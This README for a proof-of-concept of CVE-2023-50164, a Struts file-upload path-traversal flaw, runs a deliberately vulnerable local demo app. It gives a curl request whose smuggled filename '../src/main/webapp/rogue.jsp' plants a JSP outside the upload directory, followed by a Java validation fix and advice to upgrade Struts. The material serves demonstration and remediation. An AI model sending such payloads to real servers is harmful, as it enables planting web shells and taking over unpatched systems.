## https://sploitus.com/exploit?id=012A2C8A-0673-5AF7-9081-06F57EDBBDB5
This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), a
path traversal vulnerability in the file upload handling of
[struts-core](https://struts.apache.org/) that can lead to Remote Code Execution (RCE): an attacker who can
control the uploaded file's name can write the file outside the intended upload directory.

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of
[Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).

## Run the PoC

There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.

To run _with the RCE vuln_, execute the following:

```
mvn clean jetty:run -P vuln
```

To run _without the RCE vuln_, execute the following:

```
mvn clean jetty:run -P no-vuln
```

The only difference between the two profiles is the `struts-core` version: `vuln` uses `6.3.0.1`
(which has the path traversal vulnerability) and `no-vuln` uses `6.3.0.2`
(which does not).

## Exploit the Vuln

While running the `vuln` profile described above, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder and you can browse to it at:
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message).

There is also an application-level code fix that works with the older, vulnerable Struts versions, _but_ it is still
highly advised to update your version of Struts rather than rely on it.

To exercise the code fix, execute the following:

```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```

You'll see an error message: `Attempted path traversal attack`
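The following is an added example of the kind of application-level check the `upload-no-vuln.action` endpoint performs; it is not the repo's own action class. It assumes a Struts 2 action whose form field is named `Upload`, so the `fileUpload` interceptor populates `setUpload`, `setUploadFileName` and `setUploadContentType`; the destination directory `DEST_DIR` and the class name `UploadAction` are hypothetical. The vulnerable shape is left as a comment next to the hardened one so the difference is visible.

```java
// Added example (not the repo's own code): a Struts 2 upload action that rejects
// a client-controlled file name containing path traversal before the file is written.
// Assumptions: form field "Upload" (so the fileUpload interceptor calls the three
// setters below); DEST_DIR is a hypothetical upload directory.
import com.opensymphony.xwork2.ActionSupport;

import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardCopyOption;

public class UploadAction extends ActionSupport {
    private static final Path DEST_DIR = Paths.get("uploads").toAbsolutePath().normalize();

    private File upload;
    private String uploadFileName;
    private String uploadContentType;

    public void setUpload(File upload) { this.upload = upload; }
    public void setUploadContentType(String contentType) { this.uploadContentType = contentType; }

    // Vulnerable shape: the name is trusted as-is. With struts-core 6.3.0.1 an attacker can
    // override it through the "uploadFileName" request parameter (see the curl command above),
    // so "../src/main/webapp/rogue.jsp" is written verbatim relative to the upload directory.
    //
    // public String execute() throws IOException {
    //     Files.copy(upload.toPath(), DEST_DIR.resolve(uploadFileName));
    //     return SUCCESS;
    // }

    public void setUploadFileName(String uploadFileName) { this.uploadFileName = uploadFileName; }

    // Returns true only if the name is a single path component that stays inside destDir.
    // Rejecting separators and ".." outright is deliberate: "cleaning" the name would still
    // let an attacker probe for bypasses in the cleaning logic.
    static boolean isSafeFileName(String name, Path destDir) {
        if (name == null || name.isEmpty()) {
            return false;
        }
        if (name.contains("/") || name.contains("\\") || name.contains("..")) {
            return false;
        }
        Path resolved = destDir.resolve(name).normalize();
        return resolved.startsWith(destDir) && resolved.getParent().equals(destDir);
    }

    // Struts calls validate() after the parameters are bound and before execute();
    // a field error sends the request to the INPUT result instead of writing the file.
    @Override
    public void validate() {
        if (!isSafeFileName(uploadFileName, DEST_DIR)) {
            addFieldError("uploadFileName", "Attempted path traversal attack");
        }
    }

    @Override
    public String execute() throws IOException {
        Files.createDirectories(DEST_DIR);
        Path target = DEST_DIR.resolve(uploadFileName).normalize();
        // Second, defensive check in case validate() was bypassed by interceptor configuration.
        if (!target.startsWith(DEST_DIR)) {
            throw new IOException("Attempted path traversal attack");
        }
        Files.copy(upload.toPath(), target, StandardCopyOption.REPLACE_EXISTING);
        return SUCCESS;
    }
}
```

With the `vuln` profile the name `../src/main/webapp/rogue.jsp` reaches `validate()` and is rejected with the field error shown above; with `6.3.0.2` Struts normalizes the name before the action sees it, so the check never fires, which is consistent with the behaviour described in the NOTE below. Keep the check anyway: it costs nothing and protects against the next parameter-binding bug.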

**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln`
endpoint, even if you use a relative path like `../src/main/webapp/rogue.jsp`, because the patched version of Struts
strips relative path references from the file name before the action ever sees it. Check the `uploads` location
afterwards: the file lands there under its base name rather than in `src/main/webapp`.